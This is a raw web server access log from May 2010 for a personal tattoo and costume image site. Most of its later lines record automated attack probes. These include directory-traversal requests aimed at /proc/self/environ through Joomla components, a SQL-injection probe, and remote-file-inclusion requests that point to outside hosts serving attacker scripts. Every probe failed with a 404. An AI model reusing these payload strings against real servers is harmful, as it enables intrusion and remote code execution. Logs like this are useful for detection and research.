69.86.244.109 - - [15/May/2010:15:43:14 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:14 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:14 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:30 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:30 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:30 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:30 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:30 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:30 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:30 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:30 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:30 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:30 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:30 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:38 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:38 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:38 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:38 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
207.46.13.52 - - [15/May/2010:15:44:09 -0500] "GET /logs/access_log.1214784000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
173.89.130.88 - - [15/May/2010:15:45:49 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
173.89.130.88 - - [15/May/2010:15:45:49 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
173.89.130.88 - - [15/May/2010:15:45:50 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
173.89.130.88 - - [15/May/2010:15:45:50 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
173.89.130.88 - - [15/May/2010:15:45:50 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
173.89.130.88 - - [15/May/2010:15:45:54 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
173.89.130.88 - - [15/May/2010:15:45:54 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
173.89.130.88 - - [15/May/2010:15:46:01 -0500] "GET /costume/thmb9.htm HTTP/1.1" 200 2227 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
173.89.130.88 - - [15/May/2010:15:46:01 -0500] "GET /costume/costume98%20copy.JPG HTTP/1.1" 200 16840 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
173.89.130.88 - - [15/May/2010:15:46:01 -0500] "GET /costume/costume97%20copy.JPG HTTP/1.1" 200 15963 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
173.89.130.88 - - [15/May/2010:15:46:01 -0500] "GET /costume/costume99%20copy.JPG HTTP/1.1" 200 16783 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
173.89.130.88 - - [15/May/2010:15:46:01 -0500] "GET /costume/costume101%20copy.JPG HTTP/1.1" 200 16134 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
173.89.130.88 - - [15/May/2010:15:46:01 -0500] "GET /costume/costume102%20copy.JPG HTTP/1.1" 200 14869 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
173.89.130.88 - - [15/May/2010:15:46:01 -0500] "GET /costume/costume103%20copy.JPG HTTP/1.1" 200 16604 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
173.89.130.88 - - [15/May/2010:15:46:01 -0500] "GET /costume/costume104.JPG HTTP/1.1" 200 60508 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
174.123.119.50 - - [15/May/2010:15:46:53 -0500] "GET /logs/memberInfo.php?id=' HTTP/1.1" 404 303 "-""libwww-perl/5.810"
174.123.119.50 - - [15/May/2010:15:46:53 -0500] "GET /memberInfo.php?id=' HTTP/1.1" 404 298 "-""libwww-perl/5.810"
87.250.255.243 - - [15/May/2010:15:46:57 -0500] "GET /logs/access_log.1256947200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.115.111.248 - - [15/May/2010:15:49:57 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.250.255.243 - - [15/May/2010:15:52:25 -0500] "GET /logs/access_log.1243987200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [15/May/2010:15:58:59 -0500] "GET /logs/access_log.1206489600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.98.216.61 - - [15/May/2010:15:59:56 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:15:59:56 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:15:59:58 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:00:03 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:00:05 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
211.43.201.70 - - [15/May/2010:16:00:39 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:16:00:45 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:16:00:50 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:16:01:04 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:16:01:10 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:16:01:16 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
122.199.140.158 - - [15/May/2010:16:02:35 -0500] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
122.199.140.158 - - [15/May/2010:16:02:35 -0500] "GET /logs/access_log.1265241600//components/com_forum/download.php?phpbb_root_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
122.199.140.158 - - [15/May/2010:16:02:35 -0500] "GET //components/com_forum/download.php?phpbb_root_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
207.46.204.195 - - [15/May/2010:16:04:39 -0500] "GET /logs/access_log.1265846400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.192.168.241 - - [15/May/2010:16:05:22 -0500] "GET //index.php?option=com_juser&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
87.250.255.243 - - [15/May/2010:16:07:43 -0500] "GET /logs/access_log.1203120000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.98.216.61 - - [15/May/2010:16:09:45 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:09:45 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:09:45 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:09:46 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:09:46 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:09:46 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:09:46 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:09:46 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:09:47 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:09:47 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:09:47 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:09:47 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:09:47 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:09:48 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:09:48 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:13:44 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:13:45 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:13:45 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:13:45 -0500] "GET /logs/access_log.1273190400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
137.101.192.15 - - [15/May/2010:16:14:26 -0500] "GET /logs/download.php?board_skin_path=http://sogra.ru/amline/fonts/idxx.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
137.101.192.15 - - [15/May/2010:16:14:26 -0500] "GET /download.php?board_skin_path=http://sogra.ru/amline/fonts/idxx.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
137.101.192.15 - - [15/May/2010:16:14:26 -0500] "GET /logs/access_log.1273190400%20%20/download.php?board_skin_path=http://sogra.ru/amline/fonts/idxx.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
66.98.216.61 - - [15/May/2010:16:14:51 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:14:52 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:14:52 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:14:52 -0500] "GET /logs/access_log.1273190400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:14:59 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:00 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:00 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:00 -0500] "GET /logs/access_log.1273190400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:05 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:05 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:05 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:07 -0500] "GET /logs/access_log.1273190400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:08 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:08 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:08 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:10 -0500] "GET /logs/access_log.1273190400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:10 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:10 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:10 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:13 -0500] "GET /logs/access_log.1273190400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:17 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:17 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:17 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:18 -0500] "GET /logs/access_log.1273190400/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
87.250.255.243 - - [15/May/2010:16:15:23 -0500] "GET /logs/access_log.1215993600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.98.216.61 - - [15/May/2010:16:15:32 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:32 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:32 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:32 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:16:15:32 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
